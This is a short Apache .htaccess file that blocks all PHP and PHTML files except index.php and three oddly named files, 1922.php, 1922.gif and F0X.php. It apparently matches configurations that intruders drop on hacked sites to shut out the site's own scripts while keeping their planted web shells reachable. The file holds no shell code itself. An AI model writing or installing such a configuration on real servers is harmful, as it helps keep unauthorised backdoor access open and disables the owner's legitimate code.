<FilesMatch ".*\.(phtml|php)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(index).php$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "(1922).php$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "(1922).gif$">
Order Allow,Deny
Allow from all
</FilesMatch>
<FilesMatch "(F0X).php$">
Order Allow,Deny
Allow from all
</FilesMatch>